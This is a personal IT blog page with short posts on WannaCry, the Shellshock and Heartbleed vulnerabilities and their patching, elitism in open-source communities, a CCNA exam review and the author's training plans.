WannaCry……ain’t that the truth

What a month for security – if you haven’t seen the news – and this post is about a month late…. You may wish to re-consider your stance on security.  Great information can be found on Symantec’s Site.  Quite scary is how efficient these are becoming…and the amount of money they are pulling in.

Stay safe everyone!

Posted in News, security | Leave a comment

Another Year Down

I truly need to find more time to maintain this blog – it’s one of my bucket list items and frankly – something that I need to do.  We’ll start with little goals – seeing if I can muster 1 post a week – that would be nice!

Posted in News | Leave a comment

It’s a new year

Well, it seems my blog has once again fallen by the way side.  Too much going on and too much to recap here but I am going to try to keep this site up to date a little better – looking at integrating some things like twitter and such because I think it will be a good way to help broadcast security news.

Something interesting as of late that I am noticing – the leaking of source code for allot of new bad stuff (generalized).  Case in point, Security Weekly posted this and I gotta tell you, it’s becoming allot more common place.  A few searches on the deep web turns up even more interesting source code that’s making it’s way to the surface (no pun intended).

More to come – until then, stay safe and good luck in 2017!

Posted in News, security | Tagged , , , , | Leave a comment

Quick Update

Sorry about the delay in updates – it’s been a busy, busy year!  I’ll have to post about a few things, some certification achievements, some open source community news I found interesting – but overall, I hope everyone is having a great year as we round the bend to the end of 2015!!

Posted in Uncategorized | Leave a comment

And now for Bash to take the spot light…..

shellshock
Well folks – you might as well get used to this happening.  Thanks to the frothing madness of security, the uncontrollable amounts of money dumped into research and development (yet nothing to the actual project we use EVERY..SINGLE…DAY – take a hint), we are going to continue to see this sort of thing happen and get more and more mainstream attention.  Not that I have anything against security – but any day we want to start diverting some money from finding bugs to fixing the projects – I’m all for it…

First – let’s talk about the bug itself.  I’ll let you read the actual NVD listing here.  In a nutshell, the bug allows remote execution of code within the bash shell.  Nothing special, right?  We see this all the time.  The problem itself, in my opinion isn’t the bug but:

  1. The almost blanket use of bash (it’s in EVERYTHING – and I wish that was a understatement)
  2. The poor APPLICATION of code checking
  3. The poor APPLICATION of security

This bug relies on the same thing almost all bugs do – the lack of security and checks in order to execute.  By this I mean, as a very generic example – let’s say you have a public web server accepting code via CGI.  With the right strings, you could pass a command back to the shell, have the shell execute the command and return whatever you passed.  Some ideas that come to mind would be to pass back the contents of logs or perhaps ps or more valuable information….you can use your imagination.

Now, having said that – see my list above.  We can’t do nothing about item 1 – that’s a given.  Even if we could, we would simply be replacing one problem with another (how long before we come up with issues in csh, ksh, etc…).  Number 2 however – that is something we can do something about.  I’m not going to go into it here….but suffice to say it wouldn’t hurt for developers to stop using circa 90’s methods of programming…

And for the rest of us sysadmins/engineers/etc – I bring up number 3 – as this bug has been shown to be stopped by SELinux.  So for us – it wouldn’t hurt for us to stop admin’ing our boxes as if it’s the 90’s…  Either use the security tools we have or patch, Patch, PATCH!

I’ll leave this article with this final thought – Yes, the bash bug/shell shock, heartbleed, and now the SSLv3 bug are issues – BUT, the patches are there, the tools to defend are there and there is NO REASON for these issues to be as rampant as they are.  We will ALWAYS find these sorts of bugs in code, closed or open.  But instead of people crucifying OpenSSL and Bash – maybe they should contribute to the project.  And instead of companies using the products for free and contributing to more and more research by 3rd party companies to FIND issues – maybe, just MAYBE, that money could go to the teams maintaining these tools so they can get the assistance they deserve and improve the products!  Just my 2c…

 

Posted in security | Leave a comment

The “elite” IT community…..

It's awesome...to be me! Said Elitist every...single...time

It’s awesome…to be me!
Said Elitist every…single…time

I don’t know about you, but in my line of work I run into a lot of what I would call “elite IT”.

You know who I’m talking about, everyone has run into that person – he or she knows way more than you and you are wasting their time asking stupid questions. These folks usually have quite a few years of experience or a higher education degree or something in that combination that gives them a feeling of superiority.

Maybe it’s justified, maybe it’s not – either way they are going to let you know exactly how much of an inconvenience you are, why you shouldn’t be bothering them and why you shouldn’t have a computer… And I don’t care for it.

Allow me to explain a little more in depth.  See, I’ve worked with people like this most of my career. I even started out working for folks like this and it’s a miracle I stuck it out and made it as far as I have (Disclaimer:  I’m pretty stubborn). This is becoming especially true as of late since I’ve been doing more and more work in open source projects. I’m not sure what it is about the open source community, but when you get the hang of that one project, that one piece of software, sometimes it seems to bring out the worst in you.

Is this always true? No, of course not. But when the majority of people avoid open source projects because of the way the community reacts to them and their “noobness”, the only people that get hurt are the project members and community itself, which more often than not will suffer from what could be perceived as minor issues such as lack of documentation, lack of volunteer work and in general, lack of enthusiasm.

Case in point, I wrote about FreeNAS and some troubles I was having with it and I wanted to express my frustration with the project.  I accepted a comment and wanted to use it as the basis of this article.  But within a couple of days of allowing the comment to stand, I received another angry comment that I’m debating about posting. The comment basically bashes what I assume would be the previous person using phrases implying that said person get rid of their computers since they were too stupid to use them. Now this is one person in the ocean of people and certainly not by any stretch of the imagination the standard of what I expect some people in the open source community. But I’m always involved in different open source projects more often than not I hear from people around me home I introduce to these projects that these are the very examples of why they don’t want to get involved. And I don’t blame them, I mean why get involved with the project that has folks that would rather bash then help you when you can pay for the same product and get everything you need without the hassle?

Now – is this always the case – no.  ALLOT of communities have gone way above the call to help others – too many to list here.

I guess what I’m saying is before you post that comment telling someone how to do something instead of answering their question (another beef I’ll post about later) or telling said person to RTFM, try to remember you had to start somewhere too.  And with the way the industry is going, we need more people involved and educated – not scared off.

Posted in Rant | Leave a comment

Openssl – heartbleed – Z0MG!!!

heartbleedOkay – figured I better get this one out there.  If you have not heard, check out http://heartbleed.com/for some details on it.  Basically OpenSSL, again….is broken.  For the CVE check out this link.  Here’s the important notes:

  • OpenSSL 1.0.1 through 1.0.1f (inclusive) are vulnerable
  • OpenSSL 1.0.1g is NOT vulnerable
  • OpenSSL 1.0.0 branch is NOT vulnerable
  • OpenSSL 0.9.8 branch is NOT vulnerable

I got hacked because of this – Now what???

Get it patched ASAP!  Remember to redo your keys ASAP, consider them compromised!

Am I going to get hacked cause I’m running 1.0.1abc(xxxxx)?

If I was a betting man – and you’ve got a public facing device with this on it….I wouldn’t bet against it happening, how about that?  Bottom line – get this one patched ASAP – don’t waste time if you can avoid it.  If you can’t patch – recompile without the heartbeat -DOPENSSL_NO_HEARTBEATS.

If you can’t do either of the above, make sure that you train your IDS/IPS to monitor for TLS heartbeat monitoring.

I normally don’t jump on this stuff but this is pretty hot and there is no reason to at least not recompile – while there are no known documented cases of exploits, it doesn’t mean it hasn’t happened – it just means no one has admitted it yet.

Stay safe out there kids and remember…

Dont-Panic

Posted in security | Leave a comment

Red Hat and CentOS team up??

You can read about it here……..But as you can imagine, I have my reservations about what is really going on.  Those of us with not so great past experiences regarding CentOS, this does leave me hopeful for it’s future.

The real question is – where does this leave other distros like Scientific Linux?

More to come on this…..stay tuned.

Posted in News | Leave a comment

Passed my CCNA!!! Now a review!

This post sat in my drafts folder for awhile – so please keep that in mind when reading it.  Sorry about that!

I finally got around to it and took my Cisco Certified Network Associate exam (CCNA from here on out). I did this for quite a few reasons, which I’ll dive into later. Right now, I would like to use this article as a “review” of the exam, some prep work I did and final thoughts on it!

DISCLAIMER:  This is not a cheat, braindump, howto pass, etc…. and all details here are completely available from Cisco.  Also, I will be ahering to the NDA that all Cisco test takers agree to.

Now let’s get to it!  First and foremost, the test I took has been replaced.  I took the 640-802 and just made the window which I believe closed or is closing at the end of this month (at the time of this writing – October).  This review, albeit brief, will cover that version of the exam.

To sum it up, the exam was quite difficult!  I’m not by nature a network engineer but I do quite a bit of work with routers and switches and wan links, vpns, etc… you name it.  Its just the nature of my job – I wear a ton of hats!  So, as you might guess, it just made sense to add this cert to my resume (as a added bonus, like many certs, it is accepted as college credit so take that for whats its worth).  I started studying about 3 months in advance with the basics:  books, online references, and forums.  And like many advanced certs,  I did end up building a lab for this.  Now, I built my lab with the idea that I’m going to pursue my CCNP and possibly my  CCIE (stretching here folks; again I’m not by nature a network engineer so that’s more of a long term career thought I’ve had – more on that later) so my lab was a bit more expensive then the eBay kits but comparable to the equipment in those.  If you don’t have access to the resources to get cheap hardware, eBay is your friend (their CCNA kits fit the bill – here is a example of one).  Finally I used GNS3 as well (it’s quite a hog on resources so make sure your computer can handle it).  If you plan to stop at the CCNA, use that, otherwise stick with the hardware kits – nothing beats hands on physical hardware, IMHO.

Of all the resources I used, to be honest, the books were the most disappointing.  The books are so broad and cover so much on each topic that you get lost in the details.  To be frank, they are better off as references for your future in networking then study material.  The resource I found was the videos and material from CBT Nuggets.  If you can afford (or your employer can) to swing those videos, they are worth it!  Jeremy Cioara is a great educator, delivers the goods and his notes are great!

Finally, the exam.  The exam itself was hard, no doubt, BUT not unreasonable.  The questions were fair, no trickery or weird wording, and covered all of the topics I had read or reviewed or knew about from hands on experience (in other words, it’s very connected to real world experience).  I used the official Cisco guide (located on their exam site) to know what to study for – and the exam follows it to a “T”.  You do have some breathing room during the exam, but not much.  I think when I worked it out, it’s something like 2.5 min per question or something like that – so be sure you are ready for this exam!  Real world experience is going to help you out here but hands on time with the routers and switches in the kits above helped a great deal too (not everyone has access to a frame or MPLS links to play with).  Overall the exam was quite fair and challenging and I walked out of there really contemplating my next steps with Cisco.

To be honest – I got the CCNA because my cert list covers darn near all aspects of my IT career and I felt that a piece missing was networking.  While I do enjoy networking, I don’t know that I could see it being a full time function.  I enjoy security and open source platforms much more and find those to be fascinating enough.  That being said, I think anyone in the IT field that touches many aspects of IT, could benefit from rounding themselves out with a networking cert – be it network+ or the CCENT (step down from the CCNA).  Networking seems to be a dark art that most admins avoid (much like programming, which is slowly being erased with the introduction of DevOps fundamentals).  So, if nothing else, it rounds out my cert list for potential employers and validates my own personal curiosity about my ability to function as a network engineer (even if it’s not at a in depth level – I can still work with them and understand the issue(s) at hand better because of it).  Does this mean that I won’t pursue a in depth path of networking like the CCIE?  No – it simply means at this time I’m going to continue down my current path and know that the option is there should the need arise.  In the rapidly changing IT world, it never hurts to have options, believe me.

And that’s about it on the CCNA – since I have checked and my version of the exam has been shelved, there isn’t much reason to go over the number of questions, time line, etc…. though I will say this – and it hasn’t changed so far as I know – Be Sure You Are Ready.  The reason I say that during the exam, you CANNOT review your question – once you select a answer and move on to the next question – THAT’S IT, no more review for that question!  This adds a level of difficulty to the exam that was previously unexpected so, again, know your stuff!  Good luck and let me know your thoughts on the exam!

Posted in Uncategorized | Leave a comment

Training, training…and more training!

the animalAdmit it – you love training!  I love training!  We all scream for…what, that’s not right.  At any rate, I’ve been doing allot of training right now – taking allot of classes and reading up on the latest trends for IT and gaining some traction on new projects.  So, I apologize for the lack of content here.  Frankly, I’m thinking that shooting for one post per week would be awesome, but miraculous at this point (which, again I do apologize about).

So what new projects, tasks, software, process, etc, etc, etc, am I working on?  Well, it’s a mixed bag of things!  But here is a fairly decent summary:

  • Hadoop – If you haven’t heard of this….I’m not sure what to say but Google it along with big data.
  • Vagrant – Development environments on the fly – it’s a neat concept and I’m checking into it.
  • Chef/Puppet/(insert automation tool here) – these are hot, Hot, HOT right now!!!  If you are a sysadmin and you are NOT using one or both or at least learning about these tools…you are in danger of becoming obsolete!!!!
  • Virtualization – Focusing on certification goals more then anything, I’m looking into Vmware, KVM and OpenStack for right now.
  • Security – Uhm….yeah.  Anything that has to do with Cryptology, SIEM, HIDS/IDS/IPS, etc….you get the picture – and for very obvious reasons (if recent news articles aren’t enough…)

All of these tools fall under two huge primary groupings – cloud and virtualization(even though that’s a bullet up there, it’s also a primary grouping and driver).  I say this because that is the latest trend technology that has got everyone talking.  Amazon, RackSpace, OpenStack, Eucalyptus, RightScale, whatever the end goal is, it seems evident to me that the cost savings, the offsetting of responsibilities compared to old brick and mortar data centers, among other reasons, are too compelling not to be knowledgeable of these services.

So…I’m training on them.  It’s amazing to me how you can be so completely soaked in technology and still feel like a newbie when you start learning about new things like Hadoop (Hadoop will really, really make you feel like you’ve been in the dark ages when you start learning about it – also, you will definitely have at least one, “wow…where has this been” moment).  So, for right now I will continue my training march!  I’m using allot of free resources and books which I plan to compile into a list and post here.  

If you have any suggestions for resources, new technologies to look at, or just want to comment, drop a line!

Posted in News | Leave a comment